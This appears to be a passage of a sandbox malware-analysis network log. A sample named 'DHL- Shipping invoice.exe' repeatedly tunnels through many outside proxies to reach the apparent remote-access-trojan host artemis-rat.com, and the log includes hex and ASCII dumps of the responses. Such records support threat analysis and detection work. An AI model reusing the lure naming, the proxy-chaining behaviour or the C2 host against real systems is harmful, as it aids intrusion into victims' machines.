                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1027192.168.2.45312413.37.59.9931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.185236931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.352098942 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1028192.168.2.45310579.119.155.6380806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.185600996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1029192.168.2.45310795.111.237.46457386484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.185762882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1030192.168.2.450842157.230.250.185253636484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.190722942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.249967098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.343858004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.344136953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1031192.168.2.453057175.183.82.22181976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.200193882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1032192.168.2.45310695.43.244.1541536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.200383902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1033192.168.2.45106194.20.183.172806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.205876112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1034192.168.2.452587184.170.248.541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.214409113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1035192.168.2.45310445.178.133.759996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.219583035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.632702112 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1036192.168.2.45110251.15.234.222163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.224478006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250118971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.761723042 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1037192.168.2.453208104.25.115.125806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.226037025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.312897921 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1038192.168.2.451039181.209.78.759996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.235308886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250119925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.343852043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.394018888 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1039192.168.2.45315445.7.177.10522466484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.240060091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1040192.168.2.45318549.13.131.163806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.240454912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1041192.168.2.45317265.109.203.176806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.317039967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1042192.168.2.453231104.20.225.218806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.317234993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.404150963 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1043192.168.2.453228138.197.92.110385526484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.318186045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.749876022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.062978029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1044192.168.2.453186194.53.158.57532816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.319489002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1045192.168.2.450966157.230.250.185456306484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.321566105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.361469030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.453246117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.453305006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.455445051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1046192.168.2.453265104.20.179.187806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.324137926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.411489010 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1047192.168.2.453267104.16.72.45806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.324157953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.411317110 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1048192.168.2.453276104.17.37.235806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.325611115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.412955046 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1049192.168.2.45326647.89.184.1831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.325634956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.419418097 CET38INHTTP/1.1 200 OK
                            content-length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1050192.168.2.452986120.194.4.157826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.329854012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.977027893 CET319INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 170
                            Connection: close
